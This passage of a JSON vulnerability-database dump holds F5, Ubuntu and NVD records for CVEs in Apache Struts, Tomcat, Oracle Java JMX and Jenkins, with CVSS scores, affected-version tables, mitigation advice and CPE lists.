affected by this vulnerability.\n\n**Note**: For information about using an iRule to protect your web servers behind the BIG-IP virtual server, refer to the **Security Advisory Recommended Actions** section.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-09T20:36:00", "type": "f5", "title": "Apache Struts 2 vulnerability CVE-2017-5638", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2022-02-14T17:54:00", "id": "F5:K43451236", "href": "https://support.f5.com/csp/article/K43451236", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-06-08T18:45:15", "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nTo mitigate this vulnerability, you can limit access to the ARX GUI and Traffix SDC Management Console to only use secure networks.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-12-01T00:00:00", "type": "f5", "title": "SOL49820145 - Apache Tomcat vulnerability CVE-2016-8735", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-8735"], "modified": "2016-12-01T00:00:00", "id": "SOL49820145", "href": "http://support.f5.com/kb/en-us/solutions/public/k/49/sol49820145.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-06-08T00:16:08", "description": "\nF5 Product Development has assigned ID 591358 (BIG-IP), ID 594415 (BIG-IQ), ID 594418 (Enterprise Manager), ID 552323 (ARX), and INSTALLER-2440 (Traffix SDC) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth>) may list Heuristic H595913-1 on the **Diagnostics** &gt; **Identified** &gt; **Medium** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| 12.1.2| Medium| Tomcat, Configuration utility \nBIG-IP AAM| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1| 12.1.2| Medium| Tomcat, Configuration utility \nBIG-IP AFM| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1| 12.1.2| Medium| Tomcat, Configuration utility \nBIG-IP Analytics| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1| 12.1.2| Medium| Tomcat, Configuration utility \nBIG-IP APM| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| 12.1.2| Medium| Tomcat, Configuration utility \nBIG-IP ASM| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| 12.1.2| Medium| Tomcat, Configuration utility \nBIG-IP DNS| 12.0.0 - 12.1.1| 12.1.2| Medium| Tomcat, Configuration utility \nBIG-IP Edge Gateway| 11.2.1 \n10.2.1 - 10.2.4| None| Medium| Tomcat, Configuration utility \nBIG-IP GTM| 11.4.0 - 11.6.1 \n11.2.1 \n10.1.0 - 10.2.4| None| Medium| Tomcat, Configuration utility \nBIG-IP Link Controller| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| 12.1.2| Medium| Tomcat, Configuration utility \nBIG-IP PEM| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1| 12.1.2| Medium| Tomcat, Configuration utility \nBIG-IP PSM| 11.4.0 - 11.4.1 \n10.2.1 - 10.2.4| None| Medium| Tomcat, Configuration utility \nBIG-IP WebAccelerator| 11.2.1 \n10.2.1 - 10.2.4| None| Medium| Tomcat, Configuration utility \nBIG-IP WOM| 11.2.1 \n10.2.1 - 10.2.4| None| Medium| Tomcat, Configuration utility \nARX| 6.2.0 - 6.4.0| None| Low| Java SE \nEnterprise Manager| 3.1.1| None| Medium| JRE \nFirePass| None| 7.0.0| Not vulnerable| None \nBIG-IQ Cloud| 4.0.0 - 4.5.0| None| Medium| JRE \nBIG-IQ Device| 4.2.0 - 4.5.0| None| Medium| JRE \nBIG-IQ Security| 4.0.0 - 4.5.0| None| Medium| JRE \nBIG-IQ ADC| 4.5.0| None| Medium| JRE \nBIG-IQ Centralized Management| 5.0.0 - 5.1.0 \n4.6.0| None| Medium| JRE \nBIG-IQ Cloud and Orchestration| 1.0.0| None| Medium| JRE \nF5 iWorkflow| 2.0.0 - 2.0.2| None| Medium| JRE \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nF5 MobileSafe| None| 1.0.0| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| 5.0.0 \n4.0.0 - 4.4.0 \n3.3.2 - 3.5.1| None| Low| Java SE\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo mitigate this vulnerability, F5 recommends that you avoid exposing JMX RMI ports through management or data interfaces.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2016-05-28T08:22:00", "type": "f5", "title": "Oracle Java SE vulnerability CVE-2016-3427", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427"], "modified": "2017-04-06T16:50:00", "id": "F5:K73112451", "href": "https://support.f5.com/csp/article/K73112451", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:45:13", "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the **Severity** values published in the previous table. The **Severity** values and other security vulnerability parameters are defined in SOL4602: Overview of the F5 security vulnerability response policy.\n\nTo mitigate this vulnerability, F5 recommends that you avoid exposing JMX RMI ports through management or data interfaces.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4918: Overview of the F5 critical issue hotfix policy\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2016-05-27T00:00:00", "type": "f5", "title": "SOL73112451 - Oracle Java SE vulnerability CVE-2016-3427", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427"], "modified": "2016-05-27T00:00:00", "id": "SOL73112451", "href": "http://support.f5.com/kb/en-us/solutions/public/k/73/sol73112451.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntucve": [{"lastseen": "2023-12-05T15:55:06", "description": "Remote code execution is possible with Apache Tomcat before 6.0.48, 7.x\nbefore 7.0.73, 8.x before 8.0.39, 8.5.x before 8.5.7, and 9.x before\n9.0.0.M12 if JmxRemoteLifecycleListener is used and an attacker can reach\nJMX ports. The issue exists because this listener wasn't updated for\nconsistency with the CVE-2016-3427 Oracle patch that affected credential\ntypes.\n\n#### Bugs\n\n * <https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=802312>\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-11-24T00:00:00", "type": "ubuntucve", "title": "CVE-2016-8735", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427", "CVE-2016-8735"], "modified": "2016-11-24T00:00:00", "id": "UB:CVE-2016-8735", "href": "https://ubuntu.com/security/CVE-2016-8735", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T14:56:23", "description": "The Fingerprints pages in Jenkins before 1.638 and LTS before 1.625.2 might\nallow remote attackers to obtain sensitive job and build name information\nvia a direct request.", "cvss3": {}, "published": "2015-11-25T00:00:00", "type": "ubuntucve", "title": "CVE-2015-5317", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5317"], "modified": "2015-11-25T00:00:00", "id": "UB:CVE-2015-5317", "href": "https://ubuntu.com/security/CVE-2015-5317", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-05T15:42:04", "description": "The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and\n2.5.x before 2.5.10.1 has incorrect exception handling and error-message\ngeneration during file-upload attempts, which allows remote attackers to\nexecute arbitrary commands via a crafted Content-Type, Content-Disposition,\nor Content-Length HTTP header, as exploited in the wild in March 2017 with\na Content-Type header containing a #cmd= string.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[seth-arnold](<https://launchpad.net/~seth-arnold>) | \"Affected Software Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10\"\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-11T00:00:00", "type": "ubuntucve", "title": "CVE-2017-5638", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-11T00:00:00", "id": "UB:CVE-2017-5638", "href": "https://ubuntu.com/security/CVE-2017-5638", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-03T14:52:54", "description": "Unspecified vulnerability in Oracle Java SE 6u113, 7u99, and 8u77; Java SE\nEmbedded 8u77; and JRockit R28.3.9 allows remote attackers to affect\nconfidentiality, integrity, and availability via vectors related to JMX.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2016-04-21T00:00:00", "type": "ubuntucve", "title": "CVE-2016-3427", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427"], "modified": "2016-04-21T00:00:00", "id": "UB:CVE-2016-3427", "href": "https://ubuntu.com/security/CVE-2016-3427", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2023-12-05T15:04:38", "description": "Remote code execution is possible with Apache Tomcat before 6.0.48, 7.x before 7.0.73, 8.x before 8.0.39, 8.5.x before 8.5.7, and 9.x before 9.0.0.M12 if JmxRemoteLifecycleListener is used and an attacker can reach JMX ports. The issue exists because this listener wasn't updated for consistency with the CVE-2016-3427 Oracle patch that affected credential types.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-04-06T21:59:00", "type": "cve", "title": "CVE-2016-8735", "cwe": ["CWE-284"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427", "CVE-2016-8735"], "modified": "2023-11-07T02:36:00", "cpe": ["cpe:/a:apache:tomcat:7.0.31", "cpe:/a:apache:tomcat:8.5.0", "cpe:/a:apache:tomcat:8.0.7", "cpe:/a:apache:tomcat:7.0.48", "cpe:/a:apache:tomcat:6.0.27", "cpe:/a:apache:tomcat:7.0.3", "cpe:/a:apache:tomcat:6.0.41", "cpe:/a:apache:tomcat:7.0.1", "cpe:/a:apache:tomcat:7.0.17", "cpe:/a:apache:tomcat:7.0.53", "cpe:/a:apache:tomcat:7.0.14", "cpe:/a:apache:tomcat:7.0.70", "cpe:/a:apache:tomcat:7.0.2", "cpe:/a:apache:tomcat:9.0.0", "cpe:/a:apache:tomcat:6.0.0", "cpe:/a:apache:tomcat:6.0.34", "cpe:/a:apache:tomcat:6.0.23", "cpe:/a:apache:tomcat:8.5.4", "cpe:/a:apache:tomcat:6.0.35", "cpe:/a:apache:tomcat:6.0.3", "cpe:/a:apache:tomcat:7.0.36", "cpe:/a:apache:tomcat:8.0.35", "cpe:/a:apache:tomcat:6.0.2", "cpe:/a:apache:tomcat:7.0.39", "cpe:/a:apache:tomcat:8.0.12", "cpe:/a:apache:tomcat:7.0.46", "cpe:/a:apache:tomcat:6.0.8", "cpe:/a:apache:tomcat:8.0.13", "cpe:/a:apache:tomcat:8.0.28", "cpe:/a:apache:tomcat:7.0.19", "cpe:/a:apache:tomcat:8.0.5", "cpe:/a:apache:tomcat:6.0.24", "cpe:/a:apache:tomcat:8.0.31", "cpe:/a:apache:tomcat:7.0.6", "cpe:/a:apache:tomcat:7.0.12", "cpe:/a:apache:tomcat:7.0.21", "cpe:/a:apache:tomcat:7.0.23", "cpe:/a:apache:tomcat:7.0.57", "cpe:/a:apache:tomcat:8.0.37", "cpe:/a:apache:tomcat:7.0.71", "cpe:/a:apache:tomcat:7.0.64", "cpe:/a:apache:tomcat:7.0.45", "cpe:/a:apache:tomcat:7.0.59", "cpe:/a:apache:tomcat:7.0.58", "cpe:/a:apache:tomcat:8.0.21", "cpe:/a:apache:tomcat:8.5.6", "cpe:/a:apache:tomcat:8.0.11", "cpe:/a:apache:tomcat:8.0.36", "cpe:/a:apache:tomcat:6.0.29", "cpe:/a:apache:tomcat:7.0.65", "cpe:/a:apache:tomcat:6.0.33", "cpe:/a:apache:tomcat:6.0.17", "cpe:/a:apache:tomcat:6.0.40", "cpe:/a:apache:tomcat:7.0.22", "cpe:/a:apache:tomcat:7.0.42", "cpe:/a:apache:tomcat:6.0.42", "cpe:/a:apache:tomcat:8.0.24", "cpe:/a:apache:tomcat:7.0.54", "cpe:/a:apache:tomcat:8.0.20", "cpe:/a:apache:tomcat:7.0.60", "cpe:/a:apache:tomcat:8.0.8", "cpe:/a:apache:tomcat:8.5.3", "cpe:/a:apache:tomcat:6.0.11", "cpe:/a:apache:tomcat:6.0.25", "cpe:/a:apache:tomcat:6.0.4", "cpe:/a:apache:tomcat:6.0.22", "cpe:/a:apache:tomcat:6.0.36", "cpe:/a:apache:tomcat:7.0.29", "cpe:/a:apache:tomcat:8.5.1", "cpe:/a:apache:tomcat:6.0.26", "cpe:/a:apache:tomcat:8.0.1", "cpe:/a:apache:tomcat:6.0.32", "cpe:/a:apache:tomcat:6.0.9", "cpe:/a:apache:tomcat:8.0.32", "cpe:/a:apache:tomcat:7.0.50", "cpe:/a:apache:tomcat:6.0.6", "cpe:/a:apache:tomcat:7.0.72", "cpe:/a:apache:tomcat:7.0.51", "cpe:/a:apache:tomcat:8.5.5", "cpe:/a:apache:tomcat:7.0.38", "cpe:/a:apache:tomcat:8.0.10", "cpe:/a:apache:tomcat:6.0.21", "cpe:/a:apache:tomcat:7.0.35", "cpe:/a:apache:tomcat:7.0.10", "cpe:/a:apache:tomcat:8.0.3", "cpe:/a:apache:tomcat:6.0.43", "cpe:/a:apache:tomcat:7.0.7", "cpe:/a:apache:tomcat:7.0.32", "cpe:/a:apache:tomcat:8.0.15", "cpe:/a:apache:tomcat:7.0.33", "cpe:/a:apache:tomcat:8.0.23", "cpe:/a:apache:tomcat:7.0.67", "cpe:/a:apache:tomcat:7.0.52", "cpe:/a:apache:tomcat:7.0.5", "cpe:/a:apache:tomcat:8.0.26", "cpe:/a:apache:tomcat:7.0.66", "cpe:/a:apache:tomcat:7.0.27", "cpe:/a:apache:tomcat:7.0.24", "cpe:/a:apache:tomcat:8.5.2", "cpe:/a:apache:tomcat:8.0.22", "cpe:/a:apache:tomcat:6.0.1", "cpe:/a:apache:tomcat:7.0.4", "cpe:/a:apache:tomcat:8.0.38", "cpe:/a:apache:tomcat:7.0.63", "cpe:/a:apache:tomcat:7.0.16", "cpe:/a:apache:tomcat:7.0.43", "cpe:/a:apache:tomcat:6.0.39", "cpe:/a:apache:tomcat:6.0.19", "cpe:/a:apache:tomcat:8.0.33", "cpe:/a:apache:tomcat:6.0.45", "cpe:/a:apache:tomcat:6.0.15", "cpe:/a:apache:tomcat:8.0.6", "cpe:/a:apache:tomcat:6.0.13", "cpe:/a:apache:tomcat:8.0.34", "cpe:/a:apache:tomcat:8.0.27", "cpe:/a:apache:tomcat:7.0.49", "cpe:/a:apache:tomcat:7.0.18", "cpe:/a:apache:tomcat:6.0.28", "cpe:/a:apache:tomcat:6.0.5", "cpe:/a:apache:tomcat:7.0.47", "cpe:/a:apache:tomcat:8.0.4", "cpe:/a:apache:tomcat:7.0.56", "cpe:/a:apache:tomcat:6.0.31", "cpe:/a:apache:tomcat:7.0.62", "cpe:/a:apache:tomcat:8.0.30", "cpe:/a:apache:tomcat:7.0.13", "cpe:/a:apache:tomcat:7.0.30", "cpe:/a:apache:tomcat:8.0.14", "cpe:/a:apache:tomcat:7.0.41", "cpe:/a:apache:tomcat:6.0.10", "cpe:/a:apache:tomcat:8.0.29", "cpe:/a:apache:tomcat:7.0.68", "cpe:/a:apache:tomcat:8.0.25", "cpe:/a:apache:tomcat:6.0.46", "cpe:/a:apache:tomcat:8.0.0", "cpe:/a:apache:tomcat:6.0.44", "cpe:/a:apache:tomcat:7.0.44", "cpe:/a:apache:tomcat:6.0.47", "cpe:/a:apache:tomcat:7.0.55", "cpe:/a:apache:tomcat:6.0.38", "cpe:/a:apache:tomcat:7.0.15", "cpe:/a:apache:tomcat:8.0.19", "cpe:/a:apache:tomcat:8.0.2", "cpe:/a:apache:tomcat:7.0.26", "cpe:/a:apache:tomcat:7.0.11", "cpe:/a:apache:tomcat:6.0.16", "cpe:/a:apache:tomcat:6.0.20", "cpe:/a:apache:tomcat:7.0.9", "cpe:/a:apache:tomcat:8.0.18", "cpe:/a:apache:tomcat:7.0.34", "cpe:/a:apache:tomcat:7.0.61", "cpe:/a:apache:tomcat:8.0.17", "cpe:/a:apache:tomcat:7.0.37", "cpe:/a:apache:tomcat:7.0.69", "cpe:/a:apache:tomcat:6.0.37", "cpe:/a:apache:tomcat:7.0.28", "cpe:/a:apache:tomcat:6.0.18", "cpe:/a:apache:tomcat:7.0.0", "cpe:/a:apache:tomcat:7.0.40", "cpe:/a:apache:tomcat:7.0.25", "cpe:/a:apache:tomcat:6.0.14", "cpe:/a:apache:tomcat:6.0.30", "cpe:/a:apache:tomcat:8.0.16", "cpe:/a:apache:tomcat:8.0.9", "cpe:/a:apache:tomcat:7.0.8", "cpe:/a:apache:tomcat:6.0.7", "cpe:/a:apache:tomcat:6.0.12", "cpe:/a:apache:tomcat:7.0.20"], "id": "CVE-2016-8735", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8735", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apache:tomcat:7.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.49:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.26:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.37:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.30:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.43:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:m10:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.42:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.35:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.51:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:m1:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.36:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.19:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.33:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.28:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.27:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.19:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.28:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.44:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.40:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.19:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.43:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.30:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.58:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.32:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.32:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.62:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.66:*:*:*:*:*:*:*", 